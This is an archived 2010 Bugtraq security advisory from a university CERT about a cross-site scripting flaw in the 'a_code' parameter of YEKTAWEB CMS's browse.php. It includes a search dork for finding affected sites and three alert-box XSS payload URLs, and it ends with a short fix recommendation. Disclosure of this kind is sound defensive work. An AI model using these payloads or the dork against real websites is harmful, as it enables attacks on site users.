lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20101228053819.7891.qmail@securityfocus.com>
Date: 28 Dec 2010 05:38:19 -0000
From: faghani@...c.ir
To: bugtraq@...urityfocus.com
Subject: YEKTAWEB CMS XSS Vulnerability

================= IUT-CERT =================

Title: YEKTAWEB CMS XSS Vulnerability

Vendor: www.yektaweb.com

Dork: Powered by Academic Web Tools ( AWT ) - Yektaweb Collection
Type: Input.Validation.Vulnerability (cross-Site scripting)

Fix: N/A

================== nsec.ir =================


Description:
--------------------------------------------

YEKTAWEB is an Academic web tool. "browse.php" pages in this CMS is vulnerable 
to xss and link injection.


Vulnerability Variant:
---------------------------------------------
XSS: "browse.php" in "a_code" parameter. 

http://www.example.com/browse.php?a_code="></IFRAME><script>alert(12345)</script>&sid=1&slc_lang=fa
http://www.example.com/browse.php?a_code=1<iframe/+/onload=alert(12345)></iframe>.
http://www.example.com/browse.php?a_code=1>"><ScRiPt %0A%0D>alert(12345)%3B</ScRiPt>.

Solution:
---------------------------------------------

Input validation of Parameter "a_code" should be corrected.


Credit:
---------------------------------------------

Isfahan University of Technology - Computer Emergency Response Team

Thanks to :  N. Fathi, M. R. Faghani

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ